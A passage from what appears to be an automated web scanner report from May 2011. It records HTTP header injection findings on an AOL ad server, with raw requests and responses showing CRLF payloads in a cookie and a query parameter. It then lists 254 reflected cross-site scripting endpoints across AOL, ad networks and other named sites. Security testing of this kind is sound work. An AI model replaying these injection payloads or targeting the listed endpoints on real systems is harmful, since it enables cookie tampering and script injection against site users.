Cookie: s_pers=%20s_getnr%3D1304575060472-Repeat%7C1367647060472%3B%20s_nrgvo%3DRepeat%7C1367647060473%3B; rs_timezone=-18000000; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_guid=4a79a288e2ef41e5885351b80bce1f59:040511; TBS=prod:1304557062033:2; clickstreamid=772869981426160819; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 10:54:06 GMT
Set-Cookie: TBS=prod:1304557062033:2; Domain=search.aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: TBS=prod:1304592846419:0; Domain=search.aol.com; Path=/
Location: http://search.aol.com/aol/search?s_it=channel_redir_fail&q=&619d2
09d9070d268=1
Content-Length: 0
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 10:54:06 GMT
Keep-Alive: timeout=5, max=996
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

4.78. http://tacoda.at.atwola.com/rtx/r.js [N cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload d456f%0d%0a2970b16bd28 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=16768&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=56823 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=50280^1^1304552288|60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724; TData=99999|^|53380|60490|52615|60491|50507|53656|55401|57094|51182|56419|56780|54057|56969|56835|56987|50220|54063|50221|56299|56673|56148|#|50280|60183|60130|53615; N=2:e9ebc43a6cfe5a77b4292e4a653ed900,e9dea91c9922c1119a56ba5e202fb739d456f%0d%0a2970b16bd28; ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTExODI6NTY0MTk6NTY3ODA6NTQwNTc6NTY5Njk6NTY4MzU6NTY5ODc6NTAyMjA6NTQwNjM6NTAyMjE6NTYyOTk6NTY2NzM6NTYxNDg6NTAyODA6NjAxODM6NjAxMzA6NTM2MTU=; eadx=1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Thu, 05 May 2011 01:12:44 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Sun, 29-Apr-12 00:57:44 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724|50215^1^1305161864; path=/; expires=Thu, 12-May-11 00:57:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304557064^1304558864|16768^1304557064^1304558864; path=/; expires=Thu, 05-May-11 01:27:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|56835|56299|54057|50229|54063|57144|#|60183|60130|53615|50215; expires=Sun, 29-Apr-12 00:57:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:e9dea91c9922c1119a56ba5e202fb739d456f
2970b16bd28,d3862dbef41427b3fc30afea7d68bc62; expires=Sun, 29-Apr-12 00:57:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTExODI6NTY0MTk6NTYxNDg6NTczNjI6NTY2NzM6NTY5Njk6NTY5ODc6NTY3ODA6NTAyMjA6NTY4MzU6NTYyOTk6NTQwNTc6NTAyMjk6NTQwNjM6NTcxNDQ6NjAxODM6NjAxMzA6NTM2MTU6NTAyMTU=; expires=Sun, 29-Apr-12 00:57:44 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Fri, 06-May-11 00:57:44 GMT; domain=tacoda.at.atwola.com
ntCoent-Length: 287
Content-Type: application/x-javascript
Content-Length: 287

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|
...[SNIP]...

4.79. http://tacoda.at.atwola.com/rtx/r.js [si parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 1d221%0d%0ac6c2ad9c6a7 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=1d221%0d%0ac6c2ad9c6a7&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=56823 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=50280^1^1304552288|60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724; TData=99999|^|53380|60490|52615|60491|50507|53656|55401|57094|51182|56419|56780|54057|56969|56835|56987|50220|54063|50221|56299|56673|56148|#|50280|60183|60130|53615; N=2:e9ebc43a6cfe5a77b4292e4a653ed900,e9dea91c9922c1119a56ba5e202fb739; ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTExODI6NTY0MTk6NTY3ODA6NTQwNTc6NTY5Njk6NTY4MzU6NTY5ODc6NTAyMjA6NTQwNjM6NTAyMjE6NTYyOTk6NTY2NzM6NTYxNDg6NTAyODA6NjAxODM6NjAxMzA6NTM2MTU=; eadx=1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:43 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Thu, 05 May 2011 01:12:43 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Sun, 29-Apr-12 00:57:43 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724|50215^1^1305161863; path=/; expires=Thu, 12-May-11 00:57:43 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304557063^1304558863|1d221
c6c2ad9c6a7^1304557063^1304558863; path=/; expires=Thu, 05-May-11 01:27:43 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|56835|56299|54057|50229|54063|57144|#|60183|60130|53615|50215; expires=Sun, 29-Apr-12 00:57:43 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:e9dea91c9922c1119a56ba5e202fb739,d3862dbef41427b3fc30afea7d68bc62; expires=Sun, 29-Apr-12 00:57:43 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTExODI6NTY0MTk6NTYxNDg6NTczNjI6NTY2NzM6NTY5Njk6NTY5ODc6NTY3ODA6NTAyMjA6NTY4MzU6NTYyOTk6NTQwNTc6NTAyMjk6NTQwNjM6NTcxNDQ6NjAxODM6NjAxMzA6NTM2MTU6NTAyMTU=; expires=Sun, 29-Apr-12 00:57:43 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Fri, 06-May-11 00:57:43 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 287
Content-Type: application/x-javascript
Content-Length: 287

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|
...[SNIP]...

5. Cross-site scripting (reflected) previous next
There are 254 instances of this issue:

http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]
http://480-adver-view.c3metrics.com/v.js [cid parameter]
http://480-adver-view.c3metrics.com/v.js [id parameter]
http://480-adver-view.c3metrics.com/v.js [t parameter]
http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]
http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 2]
http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]
http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 2]
http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 1]
http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 2]
https://account.login.aol.com/_cqr/opr/opr.psp [authLev parameter]
https://account.login.aol.com/opr/_cqr/opr/opr.psp [authLev parameter]
http://ad.doubleclick.net/adj/huffpost.premium/front [name of an arbitrarily supplied request parameter]
http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]
http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]
http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]
http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpt parameter]
http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpvc parameter]
http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [name of an arbitrarily supplied request parameter]
http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpt parameter]
http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpvc parameter]
http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [name of an arbitrarily supplied request parameter]
http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter]
http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [body-class parameter]
http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [name of an arbitrarily supplied request parameter]
http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]
http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]
http://apartments.rentedspaces.oodle.com/ [name of an arbitrarily supplied request parameter]
http://apartments.rentedspaces.oodle.com/ [post_redirect parameter]
http://api.screenname.aol.com/auth/getToken [c parameter]
https://api.screenname.aol.com/auth/getToken [c parameter]
http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]
http://apps.conduit.com/TechCrunch_App-Techcrunch_News [REST URL parameter 1]
http://ar.voicefive.com/b/rc.pli [func parameter]
http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]
http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]
http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]
http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]
http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]
http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]
http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]
http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]
http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://bid.openx.net/json [c parameter]
http://c.aol.com/read/get_topics [callback parameter]
http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpt parameter]
http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpvc parameter]
http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpck parameter]
http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpvc parameter]
http://choices.truste.com/ca [c parameter]
http://choices.truste.com/ca [h parameter]
http://choices.truste.com/ca [iplc parameter]
http://choices.truste.com/ca [ox parameter]
http://choices.truste.com/ca [plc parameter]
http://choices.truste.com/ca [w parameter]
http://choices.truste.com/ca [zi parameter]
http://coverage.mqcdn.com/coverage [REST URL parameter 1]
http://coverage.mqcdn.com/coverage [cat parameter]
http://coverage.mqcdn.com/coverage [jsonp parameter]
http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]
http://d.tradex.openx.com/afr.php [cb parameter]
http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]
http://d.tradex.openx.com/afr.php [zoneid parameter]
http://dev.aol.com/ [name of an arbitrarily supplied request parameter]
http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 1]
http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 2]
http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 3]
http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 4]
http://digg.com/submit [REST URL parameter 1]
http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 1]
http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 2]
http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 1]
http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 2]
http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 1]
http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 2]
http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]
http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]
http://help.aol.com/help/microsites/search.do [name of an arbitrarily supplied request parameter]
http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]
http://image3.pubmatic.com/AdServer/UPug [ran parameter]
http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpck parameter]
http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpck parameter]
http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpvc parameter]
http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpvc parameter]
http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpck parameter]
http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpck parameter]
http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpvc parameter]
http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpvc parameter]
http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpck parameter]
http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpck parameter]
http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpvc parameter]
http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpvc parameter]
http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 2]
http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 2]
http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 3]
http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 3]
http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 3]
http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 3]
http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 3]
http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 3]
http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 3]
http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 3]
http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 2]
http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 3]
http://music.aol.com/radioguide/bb [REST URL parameter 2]
http://music.aol.com/radioguide/bb [REST URL parameter 2]
http://my.screenname.aol.com/_cqr/login/checkStatus.psp [cb parameter]
https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]
https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]
https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]
https://my.screenname.aol.com/_cqr/login/login.psp [createSn parameter]
https://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]
https://my.screenname.aol.com/_cqr/login/login.psp [offerId parameter]
https://my.screenname.aol.com/_cqr/login/login.psp [siteState parameter]
https://my.screenname.aol.com/_cqr/login/login.psp [uitype parameter]
https://my.screenname.aol.com/_cqr/logout/mcLogout.psp [authLev parameter]
https://my.screenname.aol.com/_cqr/logout/mcLogout.psp [brandless parameter]
https://my.screenname.aol.com/badbrowser.psp [authLev parameter]
https://my.screenname.aol.com/badbrowser.psp [authLev parameter]
https://my.screenname.aol.com/badbrowser.psp [offerId parameter]
https://my.screenname.aol.com/badbrowser.psp [offerId parameter]
https://my.screenname.aol.com/badbrowser.psp [sitedomain parameter]
https://my.screenname.aol.com/badbrowser.psp [sitedomain parameter]
http://o.aolcdn.com/smartbox/SBG/REST/ [callback parameter]
http://pglb.buzzfed.com/10032/f4f3ccafe3fc01872a82127ebf3deddd [callback parameter]
http://portal.pf.aol.com/jsonmfus/ws [callback parameter]
http://portal.pf.aol.com/jsonqpus/ws [callback parameter]
http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/ [name of an arbitrarily supplied request parameter]
http://realestate.aol.com/blog/rental-listings [REST URL parameter 2]
http://search.twitter.com/search [q parameter]
http://sportingnews.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]
http://view.c3metrics.com/v.js [cid parameter]
http://view.c3metrics.com/v.js [id parameter]
http://view.c3metrics.com/v.js [t parameter]
http://www.aolnews.com/category/goodnews/ [REST URL parameter 2]
http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter]
http://www.citysbest.com/ [icid parameter]
http://www.citysbest.com/ [name of an arbitrarily supplied request parameter]
http://www.citysbest.com/traffic/ [REST URL parameter 1]
http://www.citysbest.com/traffic/ [REST URL parameter 1]
http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2]
http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2]
http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter]
http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3]
http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter]
http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3]
http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter]
http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3]
http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter]
http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/ [icid parameter]
http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]
http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter]
http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]
http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]
http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]
http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]
http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter]
http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1]
http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2]
http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]
http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]
http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]
http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]
http://www.moviefone.com/ [name of an arbitrarily supplied request parameter]
http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]
http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]
http://www.popeater.com/ [name of an arbitrarily supplied request parameter]
http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter]
https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header]
https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]
https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header]
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]
http://aol.com/ [name of an arbitrarily supplied request parameter]
http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]
http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]
http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]
http://developer.aol.com/ [name of an arbitrarily supplied request parameter]
http://engadget.com/ [name of an arbitrarily supplied request parameter]
http://jsyk.com/ [name of an arbitrarily supplied request parameter]
http://mmafighting.com/traffic/ [bv parameter]
http://mmafighting.com/traffic/ [cb parameter]
http://mmafighting.com/traffic/ [lg parameter]
http://mmafighting.com/traffic/ [name of an arbitrarily supplied request parameter]
http://mmafighting.com/traffic/ [os parameter]
http://mmafighting.com/traffic/ [pw parameter]
http://mmafighting.com/traffic/ [rsv parameter]
http://mmafighting.com/traffic/ [rv parameter]
http://mmafighting.com/traffic/ [t parameter]
http://mmafighting.com/traffic/ [tz parameter]
http://switched.com/ [name of an arbitrarily supplied request parameter]
http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]
http://walletpop.com/ [name of an arbitrarily supplied request parameter]
http://www.aol.com/ [dlact cookie]
http://www.aol.com/ [rrpmo1 cookie]
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3]
http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3]
http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3]
http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4]

Issue background

